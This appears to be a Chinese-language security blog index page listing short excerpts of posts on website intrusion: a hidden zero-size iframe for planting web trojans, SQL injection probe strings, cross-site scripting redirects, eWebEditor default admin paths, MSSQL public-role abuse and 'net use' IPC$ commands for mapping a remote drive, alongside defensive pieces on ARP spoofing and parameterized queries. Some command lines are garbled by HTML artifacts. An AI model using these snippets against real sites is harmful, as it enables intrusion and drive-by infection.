分类: 网络安全 |

wscript.shell被修改怎么恢复

[b]wscript.shell[/b]不能用的话,很不方便,所以[b]恢复[/b]他再继续工作是必要的 
保存下面内容到 test.reg 然后再去想办法导入

注册表导入命令 regedit /s test.reg

查看更多...

Tags: wscript.shell 修改 恢复

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7536

10种挂马方式

一:框架挂马

<iframe src=地址 width=0 height=0></iframe> 

二:js文件挂马

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7291

整数溢出

在这篇文章中我将会讲述2种由于不安全编程引发的问题,导致一些恶意的用户修改受影响的进程改变程序执行流程.这2种类型的问题都是由于某一程序变量包含一个不可预料的值,因此这种类型的问题不同于那些程序内存被改写的问题,比如:缓冲区溢出,格式化溢出.所有文章中给出的程序例子都是用C语言编写,所以需要读者熟悉C语言.一些整数在内存中存储方法的知识也是会有所帮助的,但不是全部.
----[ 1.1 什么是整数?
一个整数, 在计算范围内, 是一个变量可能是一个没有小数部分的实数的.在系统上被编译处理后,

整型和指针的尺寸一般是相同的(比如: 在32位的系统中,例如i386, 一个整数是32字节长,在64位的系统中,例如SPARC,一个整数是64字节长).然而一些编译器不使整型和指针为同样尺寸 ,所以为了通俗易懂,所有这里谈到的例子是在32位的系统环境和32位的整数,长度和指针.整数,如同所有的变量只是内存的一个区域, 当我们谈及关于整数,我们通常用10进制来表示它们.换句话说也就是人们经常使用的一种编码方式.计算机是基于数字的,不能直接处理10进制,所以在计算机中整数是以2进制的方式存储的.2进制是另一种编码方式,它们只有2个数字,1和0,与之不同的10进制是用10个数字来表示的.2进制和10进制,16进制是广泛的被使用的在电脑中能够很简单的转换2进制和16进制.因为存储负数通常是必要的,这样就需要一种机制仅仅用位来代表负数,这种方法已经完成了,通过一个变量的最高为来决定正负.如果最高位置1,这个变量就被解释为负数; 如果置0,这个变量就解释为整数.这会导致一些混淆,这可以说明一些符号类型问题的概念,因为不是所有的变量都是有符号之分的,意思就是说并不是所有的类型都需要使用MSB来区分正负.这些变量被定义为无符号,它只能被赋予正数值.如果变量可正可负,可以被称做是无正负的。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 10732

入侵网站必备:(经典语句)

判断有无注入点 
; and 1=1 and 1=2 

2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 
and 0<>(select count(*) from *) 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6717

详细的脚本入侵知识总结

1.什么是脚本

脚本是指全部网页编程语言的一个代名词

2.什么是脚本入侵

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8648

跨站入侵常用代码 送给有用的朋友

<script>alert("天下2 http://tx2.netease.com ")</script> 列子

<meta http-equiv="refresh" c>  转向代码

<script language=vbscript> window.location.href="http://tx2.netease.com" </script>  指定转象百度!

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8389

一些webshell提权的方法

       现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest[b]权限[/b]是简单的,像我们在入侵网站过程中,获取[b]webshell[/b]是简单的,但是当由[b]webshell[/b]的guest权限向system[b]权限提升[/b]时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。

首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是[b]webshell下的服务器提权[/b]方法。

下面我们就进入主题,对[b]webshell的提权[/b]方法!

查看更多...

Tags: 权限 黑客 提权 webshell

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 9212

谈解决ARP攻击的方法

现在ARP不只是协议的简写,还成了掉线的代名词。很多网吧和企业网络不稳,无故掉线,经济蒙受了很大的损失。根据情况可以看出这是一种存在于网络中的一种普遍问题。出现此类问题的主要原因就是遭受了ARP攻击。由于其变种版本之多,传播速度之快,很多技术人员和企业对其束手无策。下面就来给大家从原理到应用谈一谈这方面的话题。希望能够帮大家解决此类问题,净化网络环境。

  在局域网中,通过ARP协议来完成IP地址转换为第二层物理地址,实现局域网机器的通信。ARP协议对网络安全具有重要的意义。这是建立在相互信任的基础上。如果通过伪造IP地址和MAC地址实现ARP欺骗,将在网络中产生大量的ARP通信量使网络阻塞、掉线、重定向、嗅探攻击。

  我们知道每个主机都用一个ARP高速缓存,存放最近IP地址到MAC硬件地址之间的映射记录。Windows高速缓存中的每一条记录的生存时间一般为60秒,起始时间从被创建时开始算起。默认情况下,ARP从缓存中读取IP-MAC条目,缓存中的IP-MAC条目是根据ARP响应包动态变化的。因此,只要网络上有ARP响应包发送到本机,即会更新ARP高速缓存中的IP-MAC条目。如:X向Y发送一个自己伪造的ARP应答,而这个应答中的数据发送方IP地址是192.168.1.3(Z的IP地址),MAC地址是DD-DD-DD-DD-DD-DD(Z的真实MAC地址却是CC-CC-CC-CC-CC-CC,这里被伪造了)。当Y接收到X伪造的ARP应答,就会更新本地的ARP缓存(Y可不知道被伪造了)。那么如果伪造成网关呢?

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5751

老调重弹 Microsoft Sql public利用

本人注:很老的技术了,大部分是对sql2000的测试,对sql2005不是很有效果
1.
xp_runwebtask msdb.dbo.mswebtasks
可以允许'PUBLIC'权限进行Insert、Update、Delete和Select操作

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5920
针对Web应用的攻击——SQL注入为人所熟知,安全专家对被越来越多的黑客所利用的这一方式长期以来都非常警惕。SQL注入是一种人为向Web表单的输入框中加入恶意的结构化查询语言(SQL)代码以试图获取资源的访问权限或是改变数据的安全攻击。

它需要的唯一条件是网络端口80处于开放状态。即使有设置妥当的防火墙,这一端口也是少数的几个允许流量的通道之一。最近发生的SQL注入案例是Heartland Payment Systems公司的服务器攻击事件,它让网络管理人员意识到SQL注入威胁的严重程度并且开始重新审视他们对这一攻击的防范措施。

防御SQL注入攻击的主要方法是使用参数化的存储程序。当这些程序被使用时,将以参数和用户定义的子程序的形式对数据库发出请求,这就代替了需要用户直接提供数值的命令方式。SQL参数的优势不光体现在输入的安全性上,而且他们还能够很大程度地减少SQL注入攻击发生的成功几率。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6020

Ewebeditor编辑器各版本

最近看了一些关于ewebeditor这个编辑器,关于此的漏洞还是不少,其实很多人在做安全检测的时候大多偏向于注入方面,有的时候关注下编辑器方面还是不错的,目前主要有asp、aspx、php等版本

首先我们来说下asp版本,如:www.xxx.com/admin/ewebeditor/admin_login.asp,这是一个关于此的编辑器后台,用户名当然也是默认的,如果不对大家可以下载它的数据库试一试,或许能成功的解密MD5,类似:

www.xxx.com/ewebeditor/admin_login.asp

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7158

黑客如何获取passwd密码档

目录: 
PHF:WWW的PH查询
PHF查询攻击新方法 
从新手处获取 
获取shadow密码档 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7545

Windows NT下的内核黑客后门

1 - 序言 

2 - 概述当前Windows NT下的内核后门
2.1 - NTROOTKIT
2.2 - HE4HOOK

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7021

ms09002漏洞分析

绿盟公告:
Internet Explorer的CFunctionPointer函数没有正确地处理文档对象,如果以特定序列附加并删除了对象,
就可以触发内存破坏,导致以当前登录用户的权限执行任意代码。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7453

常用sql注入语句

检测可否注入

http://127.0.0.1/xx?id=11 and 1=1 (正常页面)

http://127.0.0.1/xx?id=11 and 1=2 (出错页面)

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7831

最后的入侵

一生命是由无数个巧合加上无数次的错误组成的,不相交的路程或许会在某一个时刻变成统一的线路,可惜,结果不一定圆满,故事,才刚刚开始……




男孩——请允许我这样称呼这个已经20岁善良而内向的小伙子——一个黑客。黑客也是人,一名怎样的黑客取决于他是怎样的一个人。如果说因为性格内向和对技术本身的热爱让男孩成了一名黑客,那么男孩的善良则决定了他是一个遵守黑客守则的黑客:他总是会在找到漏洞之后,通知相关的人进行修补。

查看更多...

Tags: 最后的入侵,黑客故事

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5591

黑客常用的dos命令

net use $ipipc$Content$nbsp; user 建立IPC空链接 
net use $ipipc$Content$nbsp;密码 user用户名 建立IPC非空链接 
net use h $ipc$Content$nbsp;密码 user用户名 直接登陆后映射对方C:到本地为H 
net use h $ipc$Content$nbsp;登陆后映射对方C:到本地为H 
net use $ipipc$Content$nbsp;del 删除IPC链接 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7297

著名黑客名单

世界十大超级老牌黑客名单 

电话大盗和超级骇客约翰·德拉浦(John Draper); 

被列维称为"最后一名真正黑客"的自由软件之父理查德·斯托尔曼(Richard Stallman); 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8408